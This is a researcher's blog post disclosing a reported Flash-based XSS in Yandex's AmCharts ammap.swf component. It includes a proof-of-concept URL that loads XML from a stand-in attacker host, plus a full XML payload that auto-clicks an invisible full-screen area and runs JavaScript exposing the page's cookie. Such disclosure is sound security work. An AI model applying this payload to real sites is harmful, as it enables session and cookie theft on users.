Flash-based XSS in Yandex's AmCharts component

June 29, 2013

Here I present a (reported) Flash-based XSS vulnerability I discovered in wordstat.yandex.com, requiring no user interaction.

I think it is particularly interesting for several reasons.

It exploits the fact that the ammap.swf file, which is part of AmCharts, is vulnerable to external resource loading which allows for content spoofing and, ultimately, arbitrary JavaScript execution in the context of the hosting domain (in this case, wordstat.yandex.com).

By disassembling the SWF, we discover that the data_file and settings_file parameters are user controllable and injectable directly in the URL.

Disassembling the SWF (1) Disassembling the SWF (2)

Here is a link to a proof of concept:

http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml &settings_file=http://evilsite.com/ammap_settings.xml&.swf

We control the “map” by providing two XML files, hosted on an external server.

File ammap_settings.xml just sets a white background, disables control such as zoom and arrows, legend, small map, etc.

File ammap_data.xml is the interesting one. Here is the malicious payload:

<?xml version="1.0" encoding="UTF-8"?>
<map map_file="http://appsec.ws/ExploitDB/Configs/amMap/people.swf" zoom="100%" url="#xss">
    <movies>
    <movie file="rectangle" oid="xss" x="0" y="0" width="100%" height="100%" color="#FFFFFF"
    alpha="0" url="javascript:alert('XSS by Miki (//miki.it)\ndocument.domain = ' +
    document.domain + '\ndocument.cookie = ' + document.cookie + '\nlocation.href = ' +
    location.href)">
    </movie>
    </movies>
</map>

As you can see, an external SWF is loaded as a map, and an area (called a movie) of rectangular shape (file="rectangle") that covers the whole screen and is transparent (alpha="0").

The area, if clicked, brings to the execution of a simple JavaScript function, in this case an alert box that displays document.domain, document.cookie and location.href.

In order to make it work without user interaction, we have added an object id (oid) to the movie with the oid="xss" tag, and simulated a click of the movie with the url="#xss" attribute of the <map> tag, as documented in the AmCharts documentation (no longer online):

Attribute Type Meaning
url #object_id ID of the object which should be “clicked” when map initializes

This leads to arbitrary JS execution in the context of wordstat.yandex.com without any user interaction:

Javascript executed by just opening a URL.

Flash-based XSS in Nokia's MediaElements component

Get the perfect Google Voice number, Grep-style!